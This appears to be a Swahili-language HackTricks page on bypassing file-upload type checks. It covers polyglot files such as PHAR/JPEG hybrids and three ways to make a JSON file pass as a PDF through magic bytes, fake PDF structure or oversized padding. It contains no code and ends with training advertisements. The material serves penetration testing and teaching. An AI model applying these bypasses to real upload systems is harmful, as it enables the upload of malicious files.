Manufaa makuu ya faili za polyglot yapo katika uwezo wao wa kuvuka hatua za usalama zinazochuja faili kulingana na aina. Mara nyingi kwenye applications mbalimbali huruhusiwa aina maalum tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatarishi (mfano, JS, PHP, au faili za Phar). Hata hivyo, polyglot, kwa kuzingatia vigezo vya kimuundo vya aina mbalimbali za faili, inaweza kwa ujasiri kuzipita vikwazo hivi bila kuonekana.

Licha ya kubadilika kwao, polyglots hukumbana na mipaka. Kwa mfano, wakati polyglot inaweza kuwa PHAR file (PHp ARchive) na JPEG kwa wakati mmoja, ufanisi wa kupakiwa kwake unaweza kutegemea sera za extensions za jukwaa. Ikiwa mfumo unakuwa mkali kuhusu extensions zinazoruhusiwa, udualidad wa kimuundo peke yake hauenda kutosha kuhakikisha kupakiwa kwake.

Maelezo zaidi: https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a

Kupakia JSON halali kana kwamba ni PDF

Jinsi ya kuepuka utambuzi wa aina za faili kwa kupakia faili halali ya JSON hata kama haikuruhusiwa kwa kuiga PDF (mbinu kutoka this blog post):

  • mmmagic library: Iwapo tu magic bytes %PDF ziko katika 1024 za kwanza za faili, inachukuliwa kuwa sahihi (ona mfano kwenye post)
  • pdflib library: Ongeza muundo bandia wa PDF ndani ya field ya JSON ili library iidhani ni PDF (ona mfano kwenye post)
  • file binary: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa zaidi ya hiyo ili isiweze kuchambua yaliyomo kama json, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF

Marejeo

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks